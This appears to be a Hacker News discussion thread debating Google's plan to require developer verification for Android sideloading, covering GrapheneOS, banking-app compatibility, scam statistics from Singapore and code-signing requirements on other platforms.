grapheneOS relies on the goodwill of Google to keep Pixel devices open right?
> the antitrust prosecution will double.
In Brazil? In Malaysia? In Singapore? I highly doubt it.
I would say this is a bold choice for a company whose existing restrictions around third party apps and stores and in-app purchases has already been found illegal. While it doesn't look like they're pushing for it right now, forcing Google to sell Android was something the DOJ has considered as a penalty.
I'm not sure Google still has the ecosystem by the balls. It's very possible whatever Googlers who made this decision are the type of folks who don't comprehend they work for a monopoly that like actually can't do things like this anymore.
Maybe they gave a political donation?
It may also help to push things one way to prevent them from going the other way.
I don't think Google can be blamed for this - their own phones are one of the last which can still be unlocked.
They're also the best equipped to tell if you've done so, and restrict access from critical functionality needed by many in their day-to-day lives if you've done so.
The intentions behind all the security hardware they introduced in pixel phones first, and is now required by play integrity to function might've been well-meaning, but that doesn't really matter in the end. Security features that the user can't control and bypass aren't security features - they're digital handcuffs.
true, and recently they deserved a lot of credit for publicly releasing their device trees and drivers. unfortunately, with the 10 series pixels they no longer will be releasing device trees, which makes it much more difficult to maintain custom ROMs
The reason I chose the Android ecosystem over the Apple ecosystem, once I found out that the Maemo/Meego ecosystem was a dead end and the Openmoko ecosystem was a non-starter, is that the Android ecosystem allowed me to develop and install my own apps on my own devices whenever I wanted to, without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization. Additionally, there was even for some devices the possibility of rebuilding the whole operating system with any changes I desired.
If I'm not allowed to develop and install my own apps on my own phone, what advantage does Android have over Apple?
> without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization
I find it easier to do a git commit once every 89 days and see my app auto refreshed through Testflight for me and anyone else I care to let use it.
If you look at the build system SaaS pricing or even IDE pricing on Show HNs here, the Xcode cloud build and distribution ecosystem is an absolute steal at $9 a month. Private Testflight (with no review) can be more convenient than that desktop cable.
If this is enforced via Play Protect, then the whole mechanism can likely be disabled with:
This does not require root access and prevents Android from invoking Play Protect in the first place. (This is what AOSP's own test suite does, along with other test suites in eg. Unreal Engine, etc.)I personally won't be doing this verification for my open-source apps. I have no interest in any kind of business relationship with anyone just to publish an .apk. If that limits those who can install it to people who disable Play Protect globally, then oh well.
How long until Google decides to lock it down because "scammers" can "abuse" it?
I really hope this ends up being possible! Play Protect seems to jump up every so often and try to scare me into turning it on. Very annoying. I've wanted to disable Play Protect permanently, but never did the query to learn how, so thank you.
What does this break?
There shouldn't be any side effects other than rendering Play Protect inert. No other AOSP component relies on this setting.
There could of course be side effects in the future when this restriction is rolled out, as in your device's Play Integrity status could be affected and your banking app/phone wallet might not let you perform app-based payments from that device.
Some bank apps and payment processor already check if you have developer mode on and refuses to run.
Oh so that's why my bank app said it thought my old device was rooted when it wasn't...
Makes sense why they had to get rid of the "don't be evil" motto. They've been on a roll.
I've seen a lot of similar sentiment on this thread, but the reason I use Android is because it gives me more control than iOS by allowing full-on painless sideloading, and custom distributions like GrapheneOS. They're doing everything they can to turn themselves into a worse Apple. All of the downsides of Apple, but none of the upsides. Apple beats them in every aspect that isn't "openness".
When will the straw break the camel's back? I'm shocked we've let it get to this point with no realistic alternatives. There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
> There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
Yes there is. You all don't understand that they will use remote attestation to force everyone to use approved devices with signed apps on signed OSes only
You won't be able to bank, call a cab, write a chat message, watch a youtube video or do anything relevant on a device anymore that isn't signed, approved and controlled by google. They've made us cattle and now they are going to milk us dry.
> There's no reason a competitive Linux-based smartphone can't exist
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
> There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
Funnily, Google is one the few phone manufacturers who can’t make emergency calls to work. (e.g. search Pixel problems)
Thank you, all HNers at Google, for continuing to work there.
And yes, before you ask, I have personally quit a job that paid 3x what I was able to get elsewhere over ethics. And no, I'm not rich, probably bottom 5% in terms of assets among my colleagues, coming from a lower-class background.
How did we let this happen?
Oh, yes... Actually I remember: it was a long slow series of accepting small artificial restrictions. I remember people laughing at me at the time. They said it won't matter, they didn't care, that I was paranoid...
Now... Here we are.
Unless this is used to block TikTok or ChatGPT users still won’t care and people will still laugh at us for caring, or think wanting privacy or control of your computers is suspicious or ungood.
and don't forget all the people with the dismissive remarks about how it didn't affect them on their Graphene or Calyx phones. We're all downstream of something. The real product of Android for us was always the interoperability with the normal world for the tinkerer.
We had no part in this. The blame lies squarely with Google and its employees, who trade away user freedom for profit and career gain. Many who are smart enough to know better but instead compromise their principles. It's just another symptom of late-stage capitalism.
eternal september
If your businesses idea doesn't work without you being evil, you deserve to go bankrupt. I perceive a tendency to assume it is necessary for a company like Google to maintain full control over our ecosystem to further our progress and maintain order. However, we should know by now that this isn't the case. You don't have to be evil to be useful. See GNOME, GrapheneOS, Steam, KDE, Wikipedia, Linux or Mozilla (previously). Tricking us of their inevitability is their greatest success.
> If your businesses idea doesn't work without you being evil, you deserve to go bankrupt
Oh but they hate to hear this.
I'm not a fan of restricting sideloading. But i do hope they get better at not offering malware in the official PlayStore
We shouldn't accept "sideloading" as a term. It's meant to make "installing an app without monopolist approval" seem like a dirty/weird/niche trick.
Sep.2026: "The requirement goes into effect in Brazil, Indonesia, Singapore, and Thailand. At this point, any app installed on a certified device in these regions must be registered by a verified developer."
Any hint why those countries first?
Is it a local law there driving this whole move? Is a critical mass of malware originating from there?
So what's the solution? What's the reaction of semiofficial Android forks? Should we switch to Huawei now? Should we then have two phones? One with Android fork and one with some other "official" OS?
Ok, it seems having GrapheneOS on phone would suffice [1]. 1. https://discuss.grapheneos.org/d/25235-google-wants-to-verif...
> Google wants to combat “convincing fake apps”
Google can't even stop the scam ai companion apps on the play store that all use the same same backend full of characters...
Google also can't stop the huge wave of scam Bitcoin ads impersonating Canadian media outlets, with ai generated pictures and videos of politicians.
Get real Google.
Their own store has a dozen "AI Photo Editor Pro 2026" and "Turbo Deluxe Ultra VPN Secure Pro" apps that are "approved" and yet for sure have malware at worst and at best steals your data and serves nonstop pop up ads
Don't get me started. Every single app I search for on the play store gets a first sponsored result that is a completely different app. It is so utterly broken by design.
> Google notes “supportive initial feedback” from government authorities and other parties:
Ah, then I guess everything is fine. I'm sure they aren't in favour because it gives governments greater control over what apps we're allowed to have on our phones. That would be absurd.
I feel like that makes the most sense. That this isn't something Google thought up but something that the EU wanted to ensure its government ID app was "safe". Google does benefit but the timing seems to line up.
They trialled this in Singapore and I’ve been telling people on Hacker News that it’s been going to happen for a while:
> Singapore Android users to be blocked from installing certain unverified apps as part of anti-scam trial (07 Feb 2024)
— https://www.channelnewsasia.com/singapore/google-android-dev...
It makes total sense to the average person. There has been a constant stream of “yet another Android user got scammed out of their life savings because of Android side loading; iPhone users not affected”
It’s an inconvenient fact for power users, but side loading makes users significantly more vulnerable to scams and restricting side loading is both a predictable and reasonable response to that fact.
If you don’t like this, you need a better argument than “my desire to run any app I want is more important than pensioners losing their life savings” because that is not a winning argument with the average person, with governments, or with Google/Apple.
— https://news.ycombinator.com/item?id=44194034
> As I’ve mentioned here before, sideloading is a genuine security concern, not merely an excuse for Apple to exert control. There is a never-ending stream of people losing their life savings. It happens on Android and not iOS because Android allows sideloading and iOS doesn’t. There is a very real human cost to this.
> Police warn new Android malware scam can factory reset phones; over S$10 million lost in first half of 2023
> There have been more than 750 cases of victims downloading the malware into their phones in the first half of 2023, with losses of at least S$10 million (US$7.3 million).
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> DBS, UOB become latest banks to restrict access if unverified apps are found on customers' phones
> They are the latest banks in Singapore to do so – after OCBC and Citibank – amid a spate of malware scams targeting users of Android devices.
— https://www.channelnewsasia.com/singapore/dbs-uob-anti-scam-...
> 74-year-old man loses $70k after downloading third-party app to buy Peking duck
> “I couldn’t believe the news. I thought: Why am I so stupid? I was so angry at myself for being cheated of my life savings. My family is frustrated and I ended up quarrelling with my wife,” said Mr Loh, who has three children.
— https://www.straitstimes.com/singapore/74-year-old-man-loses...
> Singapore Android users to be blocked from installing certain unverified apps as part of anti-scam trial
> "Based on our analysis of major fraud malware families that exploit these sensitive runtime permissions, we found that over 95 per cent of installations came from internet-sideloading sources," it added.
— https://www.channelnewsasia.com/business/anduril-secures-305...
> CNA Explains: Are Android devices more prone to malware and how do you protect yourself from scams?
> Why are scammers more likely to target Android users? How do you spot a fake app and what should you do if your device is infected by malware?
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> Nearly 2,000 victims fell for Android malware scams, at least S$34.1 million lost in 2023
> In 2023, about 1,899 cases of Android malware scams were reported in Singapore. The average amount lost was about S$17,960.
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> Android users in Singapore tried to install unverified apps nearly 900,000 times in past 6 months
> These attempts were blocked by a security feature rolled out by Google six months ago as part of a trial to better protect users against malware scams, which led to at least S$34.1 million (US$25.8 million) in losses last year with about 1,900 cases reported.
— https://www.channelnewsasia.com/singapore/android-users-inst...
When governments across the globe are becoming more authoritarian, we need to protect our ability to run whatever app we want. Otherwise they'll ban communication apps when we step out of line and protest, as we've seen in places like Hong Kong on more locked down platforms like iOS. This isn't about power users. It doesn't matter how many links you post. The US is literally turning into an authoritarian dictatorship before our eyes. Germany's AfD now commands 25% of the vote and it keeps increasing. Far right parties are gaining ground everywhere.
We can't be handwringing about safety right now, because our right to free speech and to protest are at stake. Our democracies are at stake here.
All of those links 404s for me. Can you explain how the malware works? You are aware that it's not the app store that protects you, but the sandboxing? Are these impersonation vectors, ie phishing?
Oh, thanks for pointing that out. I copied and pasted from my previous comment here:
https://news.ycombinator.com/item?id=44194034
I didn’t notice that Hacker News had truncated the URLs for display. You can get to the articles by following the links in the original comment.
> You are aware that it's not the app store that protects you, but the sandboxing?
Both protect you.
> Are these impersonation vectors, ie phishing?
It’s a variety of things. Some use accessibility hooks to act as key loggers. Some seem to use exploits. Some are phishing by impersonating other apps.
I know the situation in Singapore and Thailand and I was curious if there would be anyone mentioning it in this discussion. Thank you for your comment, you should be upvoted.
I think this might backfire in that it might be enough to prompt technical people to seriously start looking for alternatives.
I personally will be extremely unhappy if I no longer can run dns66, newspipe or Firefox with ad blocking on my phone.
I think I might also start spending less time on my phone, which would be a good thing for me and a terrible thing for Google (in aggregate of course).
I've grown increasingly hateful towards both my Android and iOS devices over the last decade. The platforms themselves are increasingly user-hostile, and their appstores are crammed full of shitty, privacy-invading, telemetry-hoovering, dopamine-triggering, ad-filled, lipstick-covered apps that are often garbage compared to the pioneering days of mobile. I miss the days of my old Palm Pilot.
Is anyone working on fixing this? We can do so much better.
GrapheneOS + F-Droid is a joy to use, for me. I'm kinda shocked when I use anyone else's phone, now.
If they start selling their own devices, I will buy one and (assuming it turns out how I hope it will) recommend it strongly.
Side note, I read that GrapheneOS project is having some challenges recently.. between [0]the Android kernel drivers no longer having their Git history of changes being released (only a code dump with no history) - and [1]one of Graphene's two core contributors being detained/conscripted into a war.
[0] https://grapheneos.social/@GrapheneOS/114665558894105287
[1] https://grapheneos.social/@GrapheneOS/114359660453627718
If an alternative, privacy-focused OS like Graphene can support contactless payments (universal, like Google Wallet does it, not having to install an app per bank or card), and can 100% reliably get around apps requiring SafetyNet (or whatever they call it now) attestation, then I'd start using it.
I'd also need an alternate, safe source for common apps like Uber, Lyft, Slack, Kindle, Doordash, my banking/credit card apps, and a host of others that I use regularly. (And, no, "just use their website" is not acceptable; their website experiences are mostly crap.)
Way long ago I used to run CyanogenMod on my Android phones, and it was trivially easy to get every single app I needed working. Now it's a huge slog to get everything working on a non-Google-blessed OS, and I expect some things I use regularly just won't work. I hate hate hate this state of affairs. It makes me feel like I don't actually own my phone. But I've gotten so used to using these apps and features that it would reduce my quality of life (I know that sounds dramatic, but I'm lacking a better way to put it) to do without.
For those watching this stuff, there are two other promising paths using ZK-proofs which might disarm the tradeoff situation we've been stuck in. Banking apps etc aren't willing to eat the liability of devices that are rooted or running alternate OSes, and Google's been banking on the exclusivity that brings from being both hardware and security provider.
Path 1: a ZK-proof attestation certificate marketplace implemented by GrapheneOS (or similar) to prove safety in a privacy-securing way enough for 3rd party liability insurance markets to buy in. Banks etc can be indifferent, and wouldn't ignore the market if it got big enough. This would mean we could root any device with aggressive hacking and then apologize for it with ZK-proof certs that prove it's still in good hands - and banking apps don't need to care. No need for hard chains of custody like the Google security model.
Path 2: Don't even worry too hard about 3rd party devices or full OSes, we just need to make the option viable enough to shame Google into adopting the same ZK certificate schemes defensively. If they're reading all user data through ZK-proof certs instead of just downloading EVERYTHING then they're significantly neutered as a Big Brother force and for once we're able to actually trust them. They'd still have app marketplace centrality, but if and when phones are being subdivided with ZK-proof security it would make 3rd party monitoring of the dynamics of how those decisions get made very public (we'd see the same things google sees), so we could similarly shame them via alternatives into adopting reasonable default behaviors. Similar to Linux/Windows - Windows woulda been a lot more evil without the alternative next door.
Longer discussion (opinion not sourced from AI though): https://chatgpt.com/share/68ad1084-eb74-8003-8f10-ca324b5ea8...
All of my bank apps work fine on graphene. I'd switch banks if their app stopped working, not stop using graphene. I stopped using Google wallet, I don't miss it enough to justify using stock android. For other apps, I just put them in a separate profile that has good play installed/configured. It really wasn't bad. The worst part is wiping your phone to install graphene the first time, I prefer just to get a new device for it so I can move stuff over
Fairphone + GrapheneOS + F-droid would be even more so.
GrapheneOS can only be installed on Pixel devices, no? Hard to see Google not putting in a way to block that on their own hardware.
I've never done it but
"Many other devices are supported by GrapheneOS at a source level, and it can be built for them without modifications to the existing GrapheneOS source tree."
https://grapheneos.org/faq#supported-devices
How do you access banking and other sensitive apps? If the answer is, you don't, well, you can see how that's a non starter for the vast majority of people.
My banking app works fine on GrapheneOS. There is a crowd-sourced list here with current status for many of them: https://privsec.dev/posts/android/banking-applications-compa...
This is a good start! I think we need something like a ProtonDB for this sort of thing, but that covers all apps, not just banking apps.
I do see five banking apps I use listed there as working, which is great. But -- and maybe I'm being unnecessarily overly worried about this -- what about the future? What if I've been using Graphene for a year or two, and one of the ones that's critical for me changes how they operate, and Graphene no longer passes muster as a platform it will run on. I'm not afraid of this happening at all running Google's stock OS image, but once I do my own thing, I get to keep the pieces when it breaks.
I love how so many of the responses in this thread are "it works for my particular bank" or "my bank's website is good enough" or "I'd only need it to deposit checks, but I never need to do that"... as if those are actually helpful responses to this general problem.
Many many people have banking apps that will not work on non-Google-blessed devices, use banks that have mobile websites that are terrible, and need to do mobile check deposits (which is usually only available in the app, and not the mobile website, if the bank even has one). And no, we're not going to "change our bank".
The reality is that there are so many things that break, sometimes in subtle ways, when you try to use an alternative Android OS. Some people may not have any problems, and that's great! But many -- I would dare to say most -- will.
And there's also a ton of uncertainty: I don't really want to wipe my phone, install GrapheneOS, spend hours messing with it and setting it up, only to find that something critical doesn't work, and now I have to flash back to the stock OS, and hope I can restore everything the way it was.
There's bound to be tradeoffs between scrappy open source communities and trillion dollar industry behemoths. The fact that it's this close of a call is pretty amazing. And really you can blame your bank for not making a usable mobile site. A lot of businesses like to force users into apps because it helps with engagement metrics, not because there's any functional benefit.
Most banking app work, either directly or with a settings change to allow Google Play Service emulation. [1]
[1] https://grapheneos.org/usage#banking-apps
A web browser in the worst case scenario. The same way you'd do it on a computer.
This is quickly disappearing as an option as well. I need my bank app to authenticate even when using a web browser on desktop. Luckily my banks app still works on GrapheneOS, but I suspect it's only a matter of time before they disable that because of "security" reasons.
Android apps will be the IE6 activeX controls of the future.
What bank is this? No bank I know /requires/ you to use a mobile app for anything; the web is enough. 2FA can usually be done via email, SMS, or a google-authenticator-compatible app.
For example, Starling Bank in the UK.
They have a nice web app, but you must use their mobile app to login on the web version. The app takes a video of a QR code on the web page during login. Web login completes as soon as the mobile app notifies the server. There's no 2FA code to enter, and no alternative.
I asked them about this, by phone call, when my phone screen broke and I urgently needed to make a transaction. Surely there as an alternative? Or could I do the transaction by phone call?
They told me that indeed there is no other option. Despite having phone customer support, they had no phone or web banking service at all which could be used without a registered mobile device. The only phone service they could perform was to register a new mobile device, which I didn't have. I had a tablet, but it was too old.
So I had no good choice. The Android phone I'm using right now was bought in a hurry just so I could be allowed to make a bank transaction.
It wasn't my first choice of phone. I didn't have time to investigate alternative devices, let alone weigh up open alternatives. I ended up buying a mid-range device under pressure that seemed ok and was available in a store without waiting. (It was a brand new Samsung, and despite the IP rating it got water damaged and stopped working entirely after a few splashes a year or so later, but I was able to get it repaired.)
I should say that I'm not from the US, so that might be why you haven't heard of it.
There is also an alternative for now, but nothing as simple as SMS or authenticator app. They give you a special credit card shaped card with a card reader that you can use to authenticate with using your PIN, which is mostly considered legacy now with the bank app. It's also not realistic to be carrying this thing around everywhere either as it's bigger than my phone.
There is also a national ID app that is used everywhere that I'm worried will stop working on GrapheneOS... Because without it I won't even be able to access online government services like healthcare, taxes, etc.
You still haven't answered their question.
Which bank?
I don't want to reveal where I'm from so I can't say which bank specifically.
I don't know the bank they are referring to, but I can cite an example for me: RBC Royal Bank of Canada requires the mobile app. There is nothing you can do on their website without first 2FA via their specific mobile app, and even then only in limited transaction sizes. If you want "full access" (e.g. up to $10k daily transfer via e-transfer) then you MUST use biometrics and the mobile app.
I am quite sure Starling Bank requires an app if you still wanted an example.
What's wrong with their web apps? The only real shortcoming I can think of is depositing checks digitally but I haven't had to do that in years.
Unfortunately I have checks to deposit every couple months. And my bank has no physical presence, so the only way I can do it is through the mobile app. (They also accept deposits by mail, but I'm a little wary of that; a lost check would be a huge hassle.)
As a GrapheneOS user, the way I access my banking app is by downloading it from the Google Play store just like everyone else.
They don't all work, though: too many crank up the settings on google's various 'integrity' checks and will fail on anything that isn't 100% google-blessed. (Which is insane, because that's all that's required: on a previous phone of mine, it worked fine with a stock ROM with a bluetooth-based RCE, but upgrading to a custom ROM would have meant it was 'insecure')
Second phone for all official business apps, banking, etc. Never leaves home and it's used only for this purpose
Then use a laptop instead? Or you have one of those "modern" banks that's app only?
Is that a jab at grapheneOS ? Because thats just another thing that google is borking up. And a little bit more so the banks themselves.
GrapheneOS is the way that all phone operating systems SHOULD be made. Layers and segregation between your banking apps and all the privacy breaking trash and malware you can get off the app store.
It is the banks and google making weird rootkit shit to try and lock down things that is the problem here.
My credit union app already wants 24x7 GPS tracking of my location and full access to my camera at all times and full access to my collection of photos, so the app is already dead to me anyway. Demanding that I use it on a locked down device isn't going to change anything for me, I'm already actively not using it. I use the website on a desktop, I rarely need to access my CU at all much less access it remotely. Given the large amount of battery and bandwidth already used to track my every move, I wish there was something like "Docker for phones" where I could enable and disable 24x7 full access to my every action IRL.
This is absolutely insane. If you block access, does the app stop working?
Uh, my bank has a pretty good mobile website, personally.
How is GrapheneOS / SeedVault looking these days in terms of being able to capture reliable backups and restore them to another device (without using the cloud)?
I gather the introduction of the android:allowBackup="false" manifest flag complicated things somewhat... I thought I read since then that a Device-to-Device (D2D) impersonation mode was implemented, and would love to hear if that helped?
(I posted a couple years ago about this topic, admittedly it was a bit ranty: https://news.ycombinator.com/item?id=37774254)
The crazy thing is this is all under the pretense of preventing malware. And I constantly hear this argument that the app stores protect people, even from developers.
I truly don't get it. Are these people from 2009? Have they seen the apps on the current app stores? If you're lucky your highest rated flashlight app will only have a few Fullscreen ads and a subscription less than $10/mo. The recipe sites from content farms are less bloated and way less scammy.
It's certainly not about preventing scams. It's about preventing competition in the scamming business.
I happen to know the situation in some of the countries mentioned in the article.
There are millions of $ stolen via side-loaded malware.
It's good they decided to do something about it.
from the techcrunch article:
> According to its own survey, Google says that more than 50 times more malware came through internet-sideloaded sources compared with Google Play, where it has required developer verification since 2023.
50:1 is not preventing. It is just "well, we are better than nothing"
I'm pretty sure there can be other curated stores that can serve the customer¹
[1] customer: owner of phone, not advertisers, data merchants, etc
I regard Google highly in many domains, but this needs independent research. There is just waay too much opportunity to misuse data to paint a picture of themselves as the protectors. Especially curious about their definition of malware, because to me the app stores seem worse than browser toolbars from the 2000s.
I tried to screenshot some app on my android the other day and got an error toast reading some bullshit like "this action has been blocked by the admin." Uh I'm the admin and this is my hardware... The sketchy app was trying to prevent screenshots.
Vollo from German is one https://volla.online/. They sell a nice set of devices that run either a custom Android or Ubuntu Touch. Their custom Android has a nice bunch of UI and privacy features.
Fairphone from the Netherlands is another https://www.fairphone.com/
Another one is https://murena.com/ which (IIRC) is based in France. They don't have their own hardware though, they sell partner phones with their ROM preinstalled.
For once Fairphone never updating their phones will work in our favor! If Google roll sthis out in early 2026, anyone with a Fairphone can rest easy that they won't receive that version of the operating system until mid-2028 at least.
> Fairphone never updating their phones
I have a Fairphone and i get updates pretty frequently so not sure what you mean?
What major version of Android are you on? Last I checked (a few months ago) all Fairphones were still on Android 13.
Ah, you mean that. Yeah it's still 13.
I have Android 15 on my work phone and 10 in private. I don't really see the difference besides that they've made it more annoying to turn wifi off (requires an extra tap now, first the general internet menu and then a small slider for wifi or mobile data). Genuinely not seeing any significant changes from a user point of view (I'm sure there's lots of new SDKs for the developers, but while I've made apps before, I'm not a mobile dev keeping up with the latest things)
That Fairphone has 13 just tells me they don't waste employee time in their small business on useless upgrades just for the sake of it. Their point is fair wages and ethical mineral mining: better that they have a workable phone without even more fluff, it seems to be tricky enough already in this world :(
Android 15 has things like native satellite communications. It's not just UI changes, the backend OS is more capable.
Fairphones are also LineageOS and postmarketOS compatible, both options are without tracking and without Google's mandated policies.
LineageOS without gapps is really usable if you set aside the "big" social media apps. WhatsApp can be sourced from their website as an APK. The social apps like facebook, instagram, snap, tiktok and others all require Google Play's tracking services (aka gapps).
For YouTube there's multiple better alternative open source apps available, and mastodon, amethyst and the fediverse apps on f-droid are far superior in terms of performance to the Google Store alternatives.
The Linux Experiment podcast has a nice review of the Vollo phone https://www.youtube.com/watch?v=Dh-rIxrGXFU
You can enjoy “good old days” from what you remember of iOS and android. I also say enjoy the LLM good new days while they last.
I'm right there with you. These platforms are cancer. There's a small but growing movement away from smart phones. It'll probably never go mainstream, though.
Start complaining to your government about every shitty thing the apps and OSes do, and tell your friends to do it too, eventually we may get some action on it.
We are all mildly annoyed and therefore mildly motivated to fix the problem. Apple and Google are extremely highly motivated to retain the status quo. I still try to vote with my wallet but it's going to be hard to counter their well-funded lobbyists.
Mobile in general is a second class ecosystem. You're paying to ride in a bus that most ride for free, and when you sit down it's squishy.
It's also super nice to take notes on the fly for OpenStreetMap with StreetComplete, for holding the device up to the sky and it tells you what planet is so bright in the sky, for navigation... These things don't work on a laptop. Even if you want to carry a full-sized system in place of a smartphone, or use Ubuntu Touch, I'm not aware of software to do these things in the convenient way that Android apps let you
Of course, that's a software support issue and not a constraint imposed by the OS. Someone could make Stellarium desktop work with an orientation sensor. It's just that nobody has done that particular thing, as well as a million other things that work super well on mobile
So is it second-class, or is it just a way that is optimised for output rather than input? You get the turn instructions presented to you, you can watch videos and listen to music, note-taking is optimised to work with a few taps and is reduced to the essentials you need. You can work them out later on computer if you have time at home over of course, but at least you can contribute that way with ease
I think before we can fix all that we need to revert the renting of software via subscriptions and go back to one-time-payment. But people are too greedy for that.
I too miss Palm. I had a Pilot, then a Treo, and finally a Pixie. When HP bought Palm, I switched to iPhone. It was a sad day.
I cut my teeth on commercial b2c & b2b app dev/sales on Palm OS from the age of 14. It was sad but now I'm a full-time bootstrapped iOS dev thanks to that experience.
Windows 10 Mobile was good.
The entire developer experience was fantastic and the thing that killed it was a lack of desire from the upper leadership when it felt like they couldn't compete with the duopoly.
The developer experience was trash.
Did you have a wince app? Too bad, throw away all that and rebuild for wp7.
Do you want do anything useful? Actually, you better wait for wp7.5.
Oh look, we have a totally new thing with WP8. Upgrade to the newest framework so you can use the WP8 features... Oh, but you still need to build for the old framework for WP7. Hey, how about WP8.1, kind of the same deal.
My personal favorite though was WM10; you now need to build a Universal app that only runs on the very small number of WM10 phones... If you want to run on WP7 and WP8 which still have more sales, a universal app doesn't run there. Also, even though we said WP8 phones would be able to upgrade, either we changed our mind, or the experience is so bad most people won't. And the cherry on top... Users who upgrade from 8 to 10 might need to delete and reinstall the app, otherwise it will just show the loading dots.
Did we mention, we decided we didn't need engineers in Test in the run up to WM10? Couldn't possibly be why the release was terrible.
It's incredible that by the end of it, the WM rollercoaster made us actually miss WinCE. If you had have told us that initially none of us would have believed you. WM had so much potential and was just totally botched.
I make a point of never installing an app when there's a usable mobile site. Even if they prompt me to install every ten seconds.
Every time Reddit asks me if I want to open it up in their app, I want to do that even less.
please don't take it out on us mobile devs
Heh, I've always done this. Maybe if every mobile dev made sure I could find text like I can in a browser I'd be less strident. But really, I need a very good reason to install stuff.
Some Linux phones exist. And there is sailfishOS too.
I mean, just get a rootable phone and roll your own RoM. If you can type stuff in a terminal, its not that hard to do.
You can pretty much disable all google services. Just a fair warning though, the experience is quite degraded.
This is the same direction that Microsoft is taking Windows. Smart App Control is already rolling out to some regions - no .exe will run without a code signing certificate.
https://learn.microsoft.com/en-us/windows/apps/develop/smart...
Code signing by pseudonymous key is different that requirement to cede personal data to central registry
It requires a code signing certificate from one of the trusted central authorities, and generally as an individual you must have your legal name on the code signing certificate. It's not pseudonymous.
Code signing is somewhat OK as I can get code signing cert using provider in my country that I can go to physically and show their employee my ID.
If google does that then it’s not the worst.
Worst is having to get my ID and all details scanned and processed by Google.
I really wish Microsoft made it cheaper to get a certificate. With Apple you pay $100 a year for any number of certs. Last I looked into it a cert for a single Windows app costs $400+ per year and requires a hardware token.
They greatly improved the situation over the past couple years. Azure Trusted Signing is only $10/month and provides cloud-based signing.
It's a huge pain to set up initially, but it's smooth sailing after that. There's a good tutorial at https://melatonin.dev/blog/code-signing-on-windows-with-azur...
The setup is the most insane stupid stuff I've dealt with in a while. I am currently waiting for them to agree that my DUNS number is real, and they made me remove the WHOIS privacy from my domain name to verify that my address is associated with it. The billing receipts from my host were insufficient for reasons they couldn't explain. Had to upgrade to the $30/mo and then the $100/mo support plan just to speak to someone and it's been 4 weeks without movement. But hopefully it will be worth it in the end, the EV certs are crazy expensive and don't even remove smartscreen warnings anymore.
Ugh, sorry to hear that, yeah the whole setup process is just so insanely frustrating. I'm really dreading having to re-validate my identity documents once they expire.
For what it's worth, in my experience it was even worse with EV certs though - all the same steps including removing WHOIS privacy, plus some extra ones like voice phone number validation that had to be repeated every single year.
And then there were extra WTFs with the EV cert expiration being 365 days after an issue date which is several days before you actually receive the hardware token. Or one year they sent the hardware token fairly promptly, but forget to send the password needed to use it, and it took a week to get a response from support etc. Then again, Azure Trusted Signing has similar ridiculousness with billing being based on calendar months, with no proration for your first month even if you started at the end of the month... I mean it's just $10 but it really adds insult to injury after that signup gauntlet.
Anyway, I've heard that if your Azure Trusted Signing process gets stuck in limbo, it can be best to submit a different document, but I'm not sure if there's any alternative permitted for the DUNS step. That's especially annoying because trying to update outdated info with Dun & Bradstreet is problematic in my experience, i.e. their web forms just plain did not function properly.
Yeah I was with Comodo before and it's like you said. I thought Azure signing was going to be a breeze because I've had my Azure account for years. I submitted with both EIN and DUNS and then they said I can't submit any more validation requests for this "property", so that's why I went the $100/mo support plan to get a human somewhere to click a button and approve this thing.
Only available to US and Canadian businesses who have more than 3 years of tax history. Weird limitation.
Nice, thanks, I'll take another look!
When people say just use Linux I can only think of what was known as far back as 2014.
> NSA: Linux Journal is an "extremist forum" and its readers get flagged for extra surveillance [0]
Looks like this is a part of the move toward Chat Control and ending E2E encryption.
[0] https://www.linuxjournal.com/content/nsa-linux-journal-extre...
They saw Apple getting away with notarization under the DMA so they're doing the same. I must admit the mass demotivation strategy is working really well. Seeing this kind of news every single day, affecting you directly and not even being able to do anything
Yep. I feel powerless, and I don't know what to do. I don't think there is anything I can do, except for watch all of technology get locked down to the point that you need a monopolist's or a government's permission before you do anything with it.
It's so fundamentally depressing, and completely at odds with how I grew up viewing tech.
I predict Windows will end up going this route before Google backtracks on it.
This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
As an example of government regulation driving this change, see [1].
This regulation of NSW, Australia considers rooted devices with extra non-Google/non-Apple approved security features such as a duress/wipe PIN (a standard feature of GrapheneOS[2]) as a "dedicated encrypted criminal communication device". How the device is being used doesn't matter. It's how it _could_ be used.
[1] https://classic.austlii.edu.au/au/legis/nsw/consol_act/ca190...
[2] https://grapheneos.org/features#duress
I don't know that it's that simple. Further down that section (1920) in reference [1] reads
"(3) A dedicated encrypted criminal communication device does not include-- (a) a device if-- (i) the device has been designed, modified or equipped with software or security features, and (ii) a reasonable person would consider the software or security features have been applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection,"
It's not automatic: depending on what a reasonable person thinks and the definition of criminal activity.
> applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection
Does the jurisdiction matter? For example, if an activist was using a device to do things in another country that would be legal in Australia but were crimes in the other country.
I doubt a judge would interpret the law that way.
I mean, in my country, it's increasingly unclear to me whether things like "loudly criticizing the executive branch" are now considered criminal. Recent executive branch statements on this issue seem to indicate that they may consider some critics criminal just for being critics. But it's hard to be sure. And so far, every critic they've threatened to arrest has also been accused of committing other crimes.
So "the government only considers a duress PIN illegal if it is used to facilitate crime" seems like a potentially tricky standard to apply.
I love how this statement could apply to so many different countries right now!
> depending on what a reasonable person thinks
But this is just legal fiction, so not a barrier to "automatic"
At the pace of regulations we have, one day everything will be forbidden and we will all be criminals just for protecting our own wealth or security from these... yes, from these mafias.
And we will all rationalise it and believe it's normal and has always been like that.
Sad but true for so many people.
